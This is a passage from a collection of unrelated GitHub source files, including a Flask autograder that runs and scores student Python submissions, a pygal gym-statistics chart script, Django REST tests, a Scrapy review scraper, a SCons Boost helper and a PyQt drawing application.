0,\n\t\t\t\t'student_name': student_name,\n\t\t\t\t'student_id': student_id\n\t\t\t}\n\n\t\twith open(os.path.join(run_path, getconfig('run_filename', 'main.py')), 'w') as f:\n\t\t\tf.write(code)\n\t\t\n\t\tc.execute('SELECT * FROM `{}_val`;'.format(project_name))\n\t\tval_set = c.fetchall()\n\t\tval_set = list(map(lambda x: list(x), val_set))\n\n\t\tmetadata = getconfig('metadata_{}'.format(project_name), {})\n\t\tis_val_custom = False\n\t\tif 'is_val_custom' in metadata and metadata['is_val_custom']:\n\t\t\tcode_validator = metadata['code_val_custom']\n\t\t\twith open(os.path.join(run_path, 'validator.py'), 'w') as f:\n\t\t\t\tf.write(code_validator)\n\t\t\tis_val_custom = True\n\n\t\tdeduce_decimal = getconfig('deduce_decimal')\n\t\tdeduce_wrong = getconfig('deduce_wrong')\n\t\tdeduce_tle = getconfig('deduce_tle')\n\t\tdeduce_runtime = getconfig('deduce_runtime')\n\t\t\n\t\tmax_error = getconfig('max_error')\n\t\ttime_limit = getconfig('time_limit')\n\t\tprint(deduce_wrong)\n\t\tprint(data_student['val'])\n\t\tfor i in val_set:\n\t\t\ti[3] = json.loads(i[3])\n\t\t\t\n\t\t\t# print(\"is_val_custom:\", is_val_custom)\n\t\t\tresult = validator(i[1], i[2], check_num=i[3]['val_mode']['check_num'], check_char=i[3]['val_mode']['check_char'], max_error=max_error, time_limit=time_limit, is_val_custom=is_val_custom)\n\t\t\tif is_val_custom: #custom score for custom validator\n\t\t\t\tdata_student['val']['score'] += result['score']\n\t\t\t\tdata_student['val']['score_total'] += result['score_full']\n\t\t\telse:\n\t\t\t\tif result['correct'] == 1:\n\t\t\t\t\tdata_student['val']['score'] += i[3]['score']\n\t\t\t\t\tresult['score'] = round(i[3]['score'], 3)\n\t\t\t\telif result['correct'] == 0:\n\t\t\t\t\tdata_student['val']['score'] += i[3]['score']*(1-deduce_wrong)\n\t\t\t\t\tresult['score'] = round(i[3]['score']*(1-deduce_wrong), 3)\n\t\t\t\telif result['correct'] == 3:\n\t\t\t\t\tdata_student['val']['score'] += i[3]['score']*(1-deduce_tle)\n\t\t\t\t\tresult['score'] = round(i[3]['score']*(1-deduce_tle), 3)\n\t\t\t\telif result['correct'] == 4:\n\t\t\t\t\tdata_student['val']['score'] += i[3]['score']*(1-deduce_runtime)\n\t\t\t\t\tresult['score'] = round(i[3]['score']*(1-deduce_runtime), 3)\n\t\t\t\telif result['correct'] == 5:\n\t\t\t\t\tdata_student['val']['score'] += i[3]['score']*(1-deduce_decimal)\n\t\t\t\t\tresult['score'] = round(i[3]['score']*(1-deduce_decimal), 3)\n\t\t\t\t\n\t\t\t\tdata_student['val']['score_total'] += i[3]['score']\n\t\t\tdata_student['val']['details'].append(result)\n\t\t\ttime.sleep(0.2)\n\n\t\tdata_student['val']['score_total'] = round(data_student['val']['score_total'], 3)\n\t\tdata_student['val']['score'] = round(data_student['val']['score'], 3)\n\n\t\tdata_student['val']['last'] = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n\t\tdata_json = json.dumps(data_student)\n\n\t\tos.remove(os.path.join(run_path, getconfig('run_filename', 'main.py')))\n\n\t\tif code_id != '-1':\n\t\t\tc.execute('UPDATE {} SET `result`=?, `data`=? WHERE `id`=?;'.format(project_name), (4, data_json, code_id,))\n\t\t\tconn.commit()\n\t\tif getconfig('admin_public_id', True) == False:\n\t\t\tdata_student['val']['student_id'] = '****-**' + data_student['val']['student_id'][-3:]\n\t\tif getconfig('admin_public_name', True) == False:\n\t\t\tdata_student['val']['student_name'] = '***'\n\t\treturn jsonify(data_student['val'])\n\tabort(404)\n\ndef execute(input_val='', time_limit=1):\n\tp = subprocess.Popen([getconfig('script', 'python3')+' '+getconfig('run_filename', 'main.py')], cwd=run_path, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)\n\tinput_lines = input_val.split('\\n')\n\n\tfor i in input_lines:\n\t\tp.stdin.write((i+'\\n').encode())\n\t\tp.stdin.flush()\n\n\tcorrect = -1 #initial value\n\ttry:\n\t\touts, errs = p.communicate(timeout=time_limit)\n\texcept subprocess.TimeoutExpired:\n\t\tp.kill()\n\t\touts, errs = p.communicate()\n\t\tcorrect = 3 #TLE\n\n\touts = outs.decode()\n\tif errs != None:\n\t\terrs = errs.decode()\n\telse:\n\t\terrs = ''\n\tcwdpath = os.path.abspath(os.path.join(os.getcwd(), run_path))\n\terrs = errs.replace(cwdpath, '.')\n\n\treturn outs, errs, p.returncode, correct\n\ndef validator_real(output, answer, check_num, check_char):\n\tif check_num == False and check_char == False:\n\t\tcorrect = 1 #correct\n\telif check_num == True and check_char == False:\n\t\t#remove except numbers\n\t\tout = re.sub(r'[^0-9.\\-]', r' ', output)\n\t\tref = re.sub(r'[^0-9.\\-]', r' ', answer)\n\t\t#remove punctuations without number\n\t\twhile True:\n\t\t\tout, cnt_sub_out = re.subn(r'([^0-9])[.\\-]([^0-9])', r'\\1 \\2', out)\n\t\t\tref, cnt_sub_ref = re.subn(r'([^0-9])[.\\-]([^0-9])', r'\\1 \\2', ref)\n\t\t\tif cnt_sub_out == 0 and cnt_sub_ref == 0: break\n\t\tout = out.strip('.')\n\t\tref = ref.strip('.')\n\t\t#remove excessive whitespaces\n\t\tout = re.sub(r'\\s+', ' ', out).strip()\n\t\tref = re.sub(r'\\s+', ' ', ref).strip()\n\n\t\tout = out.split()\n\t\tref = ref.split()\n\t\t\n\t\tif len(out) != len(ref): #different number of output: wrong!\n\t\t\tcorrect = 0\n\t\telse:\n\t\t\tstate = 1 \n\t\t\tfor k, i in enumerate(out):\n\t\t\t\tj = ref[k]\n\t\t\t\tif i != j: #first, compare as string\n\t\t\t\t\tstate = 0\n\t\t\t\t\tbreak\n\t\t\tif state == 1: #if all values are exactly the same\n\t\t\t\tcorrect = 1 #correct\n\t\t\telse:\n\t\t\t\tstate = 1\n\t\t\t\tfor k, i in enumerate(out):\n\t\t\t\t\tj = ref[k]\n\t\t\t\t\ti_d = re.sub(r'\\.0+', '', i)\n\t\t\t\t\tj_d = re.sub(r'\\.0+', '', j)\n\t\t\t\t\t\n\t\t\t\t\tif i_d != j_d: #compare as float\n\t\t\t\t\t\tstate = 0\n\t\t\t\t\t\tbreak\n\t\t\t\tif state == 1:\n\t\t\t\t\tcorrect = 5 #wrong decimal format (1.0 / 1.000 / 1 type)\n\t\t\t\telse:\n\t\t\t\t\tstate = 1\n\t\t\t\t\tfor k, i in enumerate(out):\n\t\t\t\t\t\tj = ref[k]\n\t\t\t\t\t\tif '.' in i: #if float format\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\ti_f = float(i)\n\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\ti_f = -1e+20\n\t\t\t\t\t\telse: #if int format\n\t\t\t\t\t\t\ti_f = int(i)\n\t\t\t\t\t\tif '.' in j:\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tj_f = float(j)\n\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\tj_f = 1e+20\n\t\t\t\t\t\telse: #if int format\n\t\t\t\t\t\t\tj_f = int(j)\n\t\t\t\t\t\tif abs(i_f - j_f) > max_error: #compare as float\n\t\t\t\t\t\t\tstate = 0\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\ti_d = re.sub(r'\\.[0-9]+', '', i)\n\t\t\t\t\t\tj_d = re.sub(r'\\.[0-9]+', '', j)\n\t\t\t\t\t\tif i_d != j_d: #seems the same as float, but not at int (does not considered floating point error)\n\t\t\t\t\t\t\tstate = 0\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tif state == 1:\n\t\t\t\t\t\tcorrect = 5 #wrong decimal format (1.0001 / 1.000 type)\n\t\t\t\t\telse:\n\t\t\t\t\t\tcorrect = 0 #wrong answer\n\telif check_num == False and check_char == True:\n\t\t#remove all numbers\n\t\tout = re.sub(r'-?[0-9.]', r' ', output)\t#jhkim\n\t\tref = re.sub(r'-?[0-9.]', r' ', answer) #jhkim\n\t\t#remove excessive whitespaces\n\t\tout = re.sub(r'\\s+', ' ', out).strip().lower()\n\t\tref = re.sub(r'\\s+', ' ', ref).strip().lower()\n\n\t\tif out == ref:\n\t\t\tcorrect = 1\n\t\telse:\n\t\t\tcorrect = 0\n\n\telif check_num == True and check_char == True:\n\t\t#replace whitespaces and lower\n\t\tout = re.sub(r'\\s+', ' ', output).strip().lower()\t#jhkim\n\t\tref = re.sub(r'\\s+', ' ', answer).strip().lower()\t#jhkim\n\t\tif out == ref:\n\t\t\tcorrect = 1\n\t\telse:\n\t\t\tcorrect = 0\n\treturn correct\n\ndef validator(input_val='', output_val='', check_num=True, check_char=True, max_error=0.001, time_limit=1, is_val_custom=False):\n\touts, errs, returncode, correct = execute(input_val, time_limit)\n\tscore_full = 0\n\tdetails = ''\n\tscore = 0\t\n\tscore_full = 0\n\tif correct == -1: #not TLE\n\n\t\tif returncode != 0:\n\t\t\tcorrect = 4 #runtime error\n\t\telse:\n\t\t\tif is_val_custom == True:\n\t\t\t\tfrom environ.validator import validator as validator_custom\n\t\t\t\tcorrect, score, score_full, details = validator_custom(outs, output_val)\n\t\t\telse:\n\t\t\t\tcorrect = validator_real(outs, output_val, check_num, check_char)\n\t\t\t\t\n\t# print(returncode, outs, errs, correct, output_val, input_val, score, score_full, details)\n\tresult = {\n\t\t'result': returncode,\n\t\t'output': outs,\n\t\t'error': errs,\n\t\t'correct': correct,\n\t\t'answer': output_val,\n\t\t'input': input_val,\n\t\t'score': score,\n\t\t'score_full': score_full,\n\t\t'details': details,\n\t}\n\treturn result\n\n@app.route('/static/')\ndef staticfile(path):\n\treturn send_from_directory('static', path)\n\nif __name__ == \"__main__\":\n\tapp.run(host='0.0.0.0', port=5001, debug=True, use_reloader=True)","repo_name":"3e91b5/CCP2021Grader","sub_path":"grader.py","file_name":"grader.py","file_ext":"py","file_size_in_byte":30045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10812099048","text":"import sys\nimport sqlite3\nimport pygal\n\ndef getUserData(ID):\n '''Geeft 5 lists met userdata terug\n CODE = String van code die gezocht wordt in de database.\n Return = 5 lists'''\n conn = sqlite3.connect(\"C:/Users/Administrator/Desktop/rollerorange.github.io-master/sportschoolDatabase.db\")\n c = conn.cursor()\n \n cursor = c.execute('SELECT type FROM KLANT, KLANT_APPARAAT WHERE KLANT.klantID = KLANT_APPARAAT.klantID AND KLANT.klantID=?', (ID,))\n apparaten = c.fetchall()\n apparatenLijst = []\n for x in apparaten:\n apparatenLijst.append(x[0])\n\n cursor = c.execute('SELECT verbrande_calorieen FROM KLANT, KLANT_APPARAAT WHERE KLANT.klantID = KLANT_APPARAAT.klantID AND KLANT.klantID=?', (ID,))\n calorieen = c.fetchall()\n calorieenLijst = []\n for y in calorieen:\n calorieenLijst.append(y[0])\n\n cursor = c.execute('SELECT aptijd FROM KLANT, KLANT_APPARAAT WHERE KLANT.klantID = KLANT_APPARAAT.klantID AND KLANT.klantID=?', (ID,))\n tijd = c.fetchall()\n tijdLijst = []\n for z in tijd:\n tijdLijst.append(z[0])\n\n zippedList = zip(apparatenLijst, calorieenLijst, tijdLijst)\n volleLijst = list(zippedList)\n temp = []\n eindLijst = []\n for x in volleLijst:\n temp = [x[1], x[2]]\n eindLijst.append(temp)\n return(eindLijst)\n\ndef createUserDataGraph(USERID, UREN1, UREN2, UREN3, UREN4, UREN5, CAL1, CAL2, CAL3, CAL4, CAL5):\n '''Maakt een .svg grafiek bestand\n data1 = List object met alle data\n data2 = List object met alle data\n data3 = List object met alle data\n data4 = List object met alle data\n data5 = List object met alle data'''\n totaleUren = UREN1 + UREN2 + UREN3 + UREN4 + UREN5\n totaleCalorieen = CAL1 + CAL2 + CAL3 + CAL4 + CAL5\n custom_style = pygal.style.Style(\n colors=('#E853A0', '#E8537A', '#E95355', '#E87653', '#E89B53'),\n font_family='googlefont:Rubik')\n gauge = pygal.SolidGauge(\n half_pie=True, inner_radius=0.50,\n style=custom_style)\n if totaleUren is not 0 and totaleCalorieen is not 0:\n gauge.add('Uren Gesport', [{'value': totaleUren, 'max_value': totaleUren}])\n gauge.add('Crosstrainer', [{'value': UREN1, 'max_value': totaleUren}])\n gauge.add('Hometrainer', [{'value': UREN2, 'max_value': totaleUren}])\n gauge.add('Loopband', [{'value': UREN3, 'max_value': totaleUren}])\n gauge.add('Roeitrainer', [{'value': UREN4, 'max_value': totaleUren}])\n gauge.add('Krachtstation', [{'value': UREN5, 'max_value': totaleUren}])\n gauge.add('Totale Calorieen', [{'value': totaleCalorieen, 'max_value': totaleCalorieen}])\n gauge.add('Crosstrainer', [{'value': CAL1, 'max_value': totaleCalorieen}])\n gauge.add('Hometrainer', [{'value': CAL2, 'max_value': totaleCalorieen}])\n gauge.add('Loopband', [{'value': CAL3, 'max_value': totaleCalorieen}])\n gauge.add('Roeitrainer', [{'value': CAL4, 'max_value': totaleCalorieen}])\n gauge.add('Krachtstation', [{'value': CAL5, 'max_value': totaleCalorieen}])\n else:\n gauge.add('Uren Gesport', [{'value': totaleUren}])\n gauge.add('Crosstrainer', [{'value': UREN1}])\n gauge.add('Hometrainer', [{'value': UREN2}])\n gauge.add('Loopband', [{'value': UREN3}])\n gauge.add('Roeitrainer', [{'value': UREN4}])\n gauge.add('Krachtstation', [{'value': UREN5}])\n gauge.add('Totale Calorieen', [{'value': totaleCalorieen}])\n gauge.add('Crosstrainer', [{'value': CAL1}])\n gauge.add('Hometrainer', [{'value': CAL2}])\n gauge.add('Loopband', [{'value': CAL3}])\n gauge.add('Roeitrainer', [{'value': CAL4}])\n gauge.add('Krachtstation', [{'value': CAL5}])\n gauge.render_to_file(\"C:/Users/Administrator/Desktop/rollerorange.github.io-master/charts/user\" + str(USERID) + \"chart.svg\")\n\ndataList = getUserData(str(sys.argv[1]))\ncreateUserDataGraph(str(sys.argv[1]), dataList[0][0], dataList[1][0], dataList[3][0], dataList[4][0], dataList[2][0], dataList[0][1], dataList[1][1], dataList[3][1], dataList[4][1], dataList[2][1])","repo_name":"rollerorange/rollerorange.github.io","sub_path":"userData.py","file_name":"userData.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27172576920","text":"from rest_framework import status\nfrom tests.factories.personaje.personaje_factories import PersonajeFactory\nfrom tests.test_setup import TestSetUp\n\nclass PersonajeTestCase(TestSetUp):\n \n url='/api/v1/personaje/'\n \n def test_personajes(self):\n personaje=PersonajeFactory().create_personaje()\n response=self.client.get(self.url+'list/',format='json')\n self.assertEqual(response.status_code,status.HTTP_200_OK)\n \n def test_name_personaje(self):\n personaje=PersonajeFactory().create_personaje()\n response=self.client.get(self.url+'list/?',{'full_name':personaje.full_name},format='json')\n self.assertEqual(response.status_code,status.HTTP_200_OK)\n self.assertEqual(response.data[0]['full_name'],personaje.full_name) \n \n def test_name_personaje_error(self):\n personaje=PersonajeFactory().create_personaje()\n response=self.client.get(self.url+'list/?full_name=dssdsgsd',format='json')\n self.assertEqual(response.status_code,status.HTTP_200_OK)\n self.assertNotEqual(personaje.full_name,\"dssdsgsd\")\n\n def test_create_personaje(self):\n personaje=PersonajeFactory().build_personaje_JSON()\n response=self.client.post(self.url+'list/',\n personaje,\n format='json'\n )\n \n self.assertEqual(response.status_code,status.HTTP_201_CREATED)\n self.assertEqual(response.data['full_name'],personaje['full_name'])\n def test_update_personaje(self):\n personaje=PersonajeFactory().create_personaje()\n response=self.client.put(self.url+'detail/'+str(personaje.id),\n {\"full_name\":\"test1\",\n \"active\":False},\n format='json'\n )\n self.assertEqual(response.status_code,status.HTTP_200_OK)\n \n def test_delete_personaje(self):\n personaje=PersonajeFactory().create_personaje()\n response=self.client.delete(self.url+'detail/'+str(personaje.id),\n format='json'\n )\n self.assertEqual(response.status_code,status.HTTP_204_NO_CONTENT)\n # self.assertEqual(response.data['full_name'],personaje['full_name'])","repo_name":"flabio/gearplug_challenge","sub_path":"tests/test_personaje/test_personaje.py","file_name":"test_personaje.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16747247980","text":"from scrapy.spiders.sitemap import Spider\nfrom scraping_subsystem.scraper.items import Review\nfrom scrapy.exceptions import CloseSpider\n\n\nclass OtzovikSpider(Spider):\n \"\"\"Скраппер для сайта otzovik.ru\n\n Args:\n SitemapSpider (SitemapSpider): Класс Краулера\n\n Raises:\n ValueError: Нет доступа к otzovik.ru\n \"\"\"\n\n name = 'otzovik_spider'\n\n handle_httpstatus_list = [507]\n\n page_number = 1\n\n def parse(self, response):\n root_reviews = response.xpath(\n \"//*[@id='content']/div/div/div/div/div[3]/div[1]/div[1]\")\n reviews = root_reviews.xpath(\n \"//*[@id='content']/div/div/div/div/div[3]/div[1]/div[1]/div\")\n\n if len(reviews) == 0:\n raise CloseSpider('No reviews in response')\n del root_reviews\n for review in reviews:\n tmp_review = Review()\n tmp_review['review_url'] = review.xpath(\"./meta[1]/@content\").get()\n tmp_review['author'] = review.xpath(\n \"./div[@itemprop='author']/div/div/a/span/text()\").get()\n tmp_review['review_date'] = review.xpath(\n \"./div[@class='item-right']/div[@class='review-postdate']/span/@title\").get()\n tmp_review['text_data'] = review.xpath(\n \"./div[@class='item-right']/div[@class='review-teaser']/text()\").get()\n yield tmp_review\n self.page_number += 1\n next_page = f\"http://otzovik.com/reviews/set_sportivnih_magazinov_sportmaster_russia_moscow/{self.page_number}/\"\n yield response.follow(next_page, callback=self.parse)\n","repo_name":"Analytical-system-of-company-image/scraping-subsystem","sub_path":"scraping_subsystem/scraper/spiders/otzovik_spider.py","file_name":"otzovik_spider.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4027789931","text":"import os\nimport glob\nimport re\nimport sys\n\nclass Found(BaseException):\n pass\n\ndef add_boost(env, libs):\n if env[\"USE_MSVC\"]:\n # compiled boost libraries might have extra prefix and postfix\n paths = []\n if \"LIBPATH\" in env:\n paths += env.subst(env[\"LIBPATH\"])\n paths += os.environ[\"LIB\"].split(\";\")\n paths = [p for p in paths if p != \"\"]\n\n if \"/MDd\" in env[\"CCFLAGS\"]:\n SUFFIXES = [\"-vc*-mt-gd-*\"]\n elif \"/MD\" in env[\"CCFLAGS\"]:\n SUFFIXES = [\"-vc*-mt-*\"]\n elif \"/MTd\" in env[\"CCFLAGS\"]:\n SUFFIXES = [\"-vc*-mt-sgd-*\"]\n elif \"/MT\" in env[\"CCFLAGS\"]:\n SUFFIXES = [\"-vc*-mt-s-*\"]\n\n renamed_libs = []\n for lib in libs:\n try:\n for suffix in SUFFIXES:\n for p in paths:\n fnglob = os.path.join(p, \"lib\" + lib + suffix + \".lib\")\n files = glob.glob(fnglob)\n if len(files) > 0:\n m = re.search(r\"([^\\\\]*[.]lib)\", files[0])\n renamed_libs.append(m.group(1))\n raise Found()\n except Found:\n continue\n else:\n renamed_libs.append(lib)\n\n env.AppendUnique(LIBS=renamed_libs)\n else:\n if sys.platform == \"darwin\":\n rawlibs = libs\n libs = []\n for l in rawlibs:\n if env[\"COMPILE_DEBUG\"]:\n libs.append(l + \"-mt-d\")\n else:\n libs.append(l + \"-mt\")\n env.AppendUnique(LIBS=libs)\n\ndef generate(env):\n libboost_dir = env.get(\"LIBBOOST_DIR\") or os.environ.get(\"LIBBOOST_DIR\")\n if libboost_dir is not None:\n env.AppendUnique(CPPPATH=[os.path.join(libboost_dir, \"include\")])\n env.AddMethod(add_boost, \"AddBoost\")\n\ndef exists(env):\n return True\n","repo_name":"dsiroky/backnocles","sub_path":"tools/scons/boost.py","file_name":"boost.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"11491571619","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5 import *\nfrom PyQt5 import QtWidgets\nimport sys\n\nfrom factories.paint_settings import PaintSettings\nfrom factories.palette_factory import PaletteFactory\n\nfrom widgets.canvas import Canvas\nfrom widgets.widget_item import WidgetItem\nfrom widgets.palette_item import PaletteItem\nfrom widgets.item_container import ItemContainer\nfrom eye_tracker.mouse_emulator import MouseEmulator\n\n\"\"\"Main Window\"\"\"\nclass WindowView(QMainWindow):\n def __init__(self, width, height):\n QMainWindow.__init__(self, flags=Qt.Window)\n self.width = width\n self.height = height\n self.win = QWidget()\n self.widgetItems = []\n self.__setupWindow()\n self.image = None\n\n def setupFirstCursor(self):\n pm = QtGui.QPixmap('../resources/cursorRedCircle.png')\n cursor = QtGui.QCursor(pm)\n self.win.setCursor(cursor)\n self.win.update()\n MouseEmulator.firstTimer.stop()\n\n def setupSecondCursor(self):\n pm = QtGui.QPixmap('../resources/cursorGreenCircle.png')\n cursor = QtGui.QCursor(pm)\n self.win.setCursor(cursor)\n self.win.update()\n MouseEmulator.secondTimer.stop()\n\n def setupDefaultCursor(self):\n self.win.setCursor(Qt.CustomCursor)\n self.win.update()\n\n def __setupWindow(self):\n self.win.setStyleSheet(\"background-color:rgb(200,209,222);\")\n self.win.setWindowTitle(\"PyQt\")\n\n toolContainerWidth = self.width * 0.07\n toolContainerHeight = self.height\n\n self.tools = self.__createTools(toolContainerWidth, toolContainerWidth * 0.45)\n self.fileTools = self.__createFileTools(toolContainerWidth, self.width * 0.035)\n\n\n currentColor = PaletteItem(\n toolContainerWidth,\n toolContainerWidth * 0.5,\n None,\n PaintSettings.currentColor\n )\n\n paletteItems = []\n for palette in PaletteFactory.createPalette(PaintSettings.paletteId):\n paletteItems.append(PaletteItem(\n toolContainerWidth * 1,\n toolContainerWidth * 0.25,\n None,\n palette,\n currentColor\n ))\n\n colorLayoutFirstColumn = self.__createToolContainer(\n QVBoxLayout(),\n 0,\n 0,\n paletteItems\n )\n\n colorCurrentContainer = self.__createToolContainer(\n QVBoxLayout(),\n toolContainerWidth,\n toolContainerHeight,\n [currentColor]\n )\n\n self.canvas = self.__createCanvas(self.width * 0.93, self.height)\n\n mainLayout = self.__createBox(\n QHBoxLayout(),\n 0,\n 0,\n self.width,\n self.height,\n (10, 10, 0, 0),\n [\n self.canvas,\n self.__createToolContainer(\n QVBoxLayout(),\n toolContainerWidth,\n toolContainerHeight,\n self.tools + [colorCurrentContainer] + [colorLayoutFirstColumn] + self.fileTools,\n\n )\n ]\n )\n\n self.win.setLayout(\n mainLayout\n )\n\n self.win.setMouseTracking(True)\n\n def __createBox(self, box, x, y, width, height, margins, widgets):\n box.setGeometry(QRect(x, y, width, height))\n box.setContentsMargins(*margins)\n\n for widget in widgets:\n box.addWidget(widget)\n\n return box\n\n def __createCanvas(self, width, height):\n canvas = Canvas(\n width,\n height,\n self\n )\n\n canvas.setFocusPolicy(Qt.StrongFocus)\n\n return canvas\n\n def __createToolContainer(self, layout, width, height, tools):\n toolContainer = ItemContainer(\n width,\n height,\n self\n )\n\n layout.setContentsMargins(0, 10, 0, -5)\n\n toolContainer.setWidgets(\n layout,\n tools\n )\n\n return toolContainer\n\n def __createSliderContainer(self, layout, width, height, margins, tools):\n sliderContainer = ItemContainer(\n width,\n height,\n self\n )\n\n layout.setContentsMargins(*margins)\n\n sliderContainer.setWidgets(\n layout,\n tools\n )\n\n return sliderContainer\n\n def __createTools(self, width, height):\n tools = [\n WidgetItem(\n width, height,\n self.onClickItem(PaintSettings.selectRectangle),\n QtGui.QIcon(QtGui.QPixmap(\"../resources/rectangle.png\"))\n ),\n WidgetItem(\n width, height,\n self.onClickItem(PaintSettings.selectTriangle),\n QtGui.QIcon(QtGui.QPixmap(\"../resources/triangle.png\"))\n ),\n WidgetItem(\n width, height,\n self.onClickItem(PaintSettings.selectCircle),\n QtGui.QIcon(QtGui.QPixmap(\"../resources/circle.png\"))\n ),\n WidgetItem(\n width, height,\n self.onClickItem(PaintSettings.selectLine),\n QtGui.QIcon(QtGui.QPixmap(\"../resources/line.png\"))\n ),\n WidgetItem(\n width, height,\n self.onClickItem(PaintSettings.selectPen),\n QtGui.QIcon(QtGui.QPixmap(\"../resources/pen.png\"))\n ),\n WidgetItem(\n width, height,\n self.onClickItem(PaintSettings.selectBrush),\n QtGui.QIcon(QtGui.QPixmap(\"../resources/brush.png\"))\n ),\n WidgetItem(\n width, height,\n self.onClickItem(PaintSettings.selectSmartPen),\n QtGui.QIcon(QtGui.QPixmap(\"../resources/smartPen.png\"))\n ),\n WidgetItem(\n width, height,\n self.onClickItem(PaintSettings.selectEraser),\n QtGui.QIcon(QtGui.QPixmap(\"../resources/eraser.png\"))\n ),\n\n ]\n\n tools[0].setClickStyle()\n\n return tools\n\n def __createFileTools(self, width, height):\n tools = [\n WidgetItem(\n width, height,\n self.saveImage,\n QtGui.QIcon(QtGui.QPixmap(\"../resources/save.png\")),\n True\n ),\n WidgetItem(\n width, height,\n self.openFileNameDialog,\n QtGui.QIcon(QtGui.QPixmap(\"../resources/open.png\")),\n True\n ),\n ]\n\n return tools\n\n def openFileNameDialog(self):\n options = QFileDialog.Options()\n\n options |= QFileDialog.DontUseNativeDialog\n fileName, _ = QFileDialog.getOpenFileName(self, \"QFileDialog.getOpenFileName()\", \"\",\n \"Image Files (*.png *.jpg *.bmp)\", options=options)\n if fileName:\n print(fileName)\n self.canvas.clearImage()\n self.image = QImage(fileName)\n\n def saveImage(self):\n options = QFileDialog.Options()\n\n options |= QFileDialog.DontUseNativeDialog\n fileName, _ = QFileDialog.getSaveFileName(self, \"QFileDialog.getSaveFileName()\", \"\",\n \"Image Files (*.png *.jpg *.bmp)\", options=options)\n if fileName:\n print(fileName)\n if \".png\" not in fileName:\n fileName += \".png\"\n\n self.canvas.saveCanvas(fileName)\n\n","repo_name":"alexzhukovwork/GraphicEditor","sub_path":"app/widgets/window_view.py","file_name":"window_view.py","file_ext":"py","file_size_in_byte":7618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27877574717","text":"from lollygag.query_builder import QueryBuilder\n\n\ndef test_can_build_name_query():\n qb = QueryBuilder().name('div')\n assert qb.raw_query == {'name': 'div'}\n\n\ndef test_can_build_chained_query():\n qb = QueryBuilder().name('foo')._and().attribute('bar', 'b.*')\n assert qb.raw_query == {\n 'and': ({\n 'name': 'foo'\n }, {\n 'attribute': {\n 'name': 'bar',\n 'value': 'b.*'\n }\n })\n }\n\n\ndef test_longer_chained_query():\n qb = QueryBuilder().name('foo')._and().attribute(\n 'bar', 'b.*')._or().data('kewlaid')\n assert qb.raw_query == {\n 'or': ({\n 'and': ({\n 'name': 'foo'\n }, {\n 'attribute': {\n 'name': 'bar',\n 'value': 'b.*'\n }\n })\n }, {\n 'data': 'kewlaid'\n })\n }\n\n\ndef test_not_query():\n qb = QueryBuilder()._not().name('div')\n assert qb.raw_query == {'not': {'name': 'div'}}\n\n\ndef test_not_chains():\n qb = QueryBuilder()._not().name('div')._and()._not().data('foo')\n assert qb.raw_query == {\n 'and': ({\n 'not': {\n 'name': 'div'\n }\n }, {\n 'not': {\n 'data': 'foo'\n }\n })\n }\n","repo_name":"snorrwe/lollygag","sub_path":"test/test_query_builder.py","file_name":"test_query_builder.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31543923849","text":"from random import randint\nimport json\nimport operator\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nfrom googleapiclient.discovery import build\nfrom App import values_data, models\nfrom django import template\nfrom django.shortcuts import render, redirect\nfrom App.forms import FruitCreationForm, commentinputforme\nfrom django.contrib import messages\n\nregister = template.Library()\n\n\ndef index(request):\n \"\"\"\n Отображение главной страницы\n\n :param request: объект с деталями запроса\n :type request: :class:`django.http.HttpRequest`\n :return: объект ответа сервера с HTML-кодом внутри\n :rtype: :class:`django.http.HttpResponse`\n \"\"\"\n context = {}\n data_guest = values_data.data_guest\n data_loged = values_data.data_loged\n indg = randint(0, len(data_guest) - 1)\n indl = randint(0, len(data_loged) - 1)\n context[\"index_g\"] = data_guest[indg]\n context[\"index_l\"] = data_loged[indl]\n\n return render(request, \"index.html\", context)\n\n\n@login_required\ndef food_creation(request):\n \"\"\"\n Отображение страницы с добавлением своей еды\n\n :param request: объект с деталями запроса\n :type request: :class:`django.http.HttpRequest`\n :return: объект ответа сервера с HTML-кодом внутри\n :rtype: :class:`django.http.HttpResponse`\n \"\"\"\n context = {}\n if request.method == 'POST':\n form = FruitCreationForm(request.POST, request.FILES)\n\n name = form.data['title']\n description = form.data['description']\n vitamins = request.POST.getlist('vitamins')\n deathdoze = form.data['deathdoze']\n interesting_fact = form.data['interesting_fact']\n image = form.files['image']\n calories = form.data['calories']\n\n fruit = models.Food(name=name, author=request.user, searched=0,\n description=description, deathdoze=deathdoze,\n image=image, calories=calories,\n interesting_fact=interesting_fact)\n fruit.save()\n\n for vitamin in vitamins:\n fruit.vitamins.create(name=vitamin)\n\n messages.success(request, 'Фрукт создан')\n\n else:\n form = FruitCreationForm()\n context['form'] = form\n\n form = FruitCreationForm()\n context['form'] = form\n\n return render(request, 'food_creation.html', context=context)\n\n\ndef food_list_page(request):\n \"\"\"\n Отображение страницы со всей едой\n\n :param request: объект с деталями запроса\n :type request: :class:`django.http.HttpRequest`\n :return: объект ответа сервера с HTML-кодом внутри\n :rtype: :class:`django.http.HttpResponse`\n \"\"\"\n context = {}\n search_query = request.GET.get('search_fruit', '')\n\n if 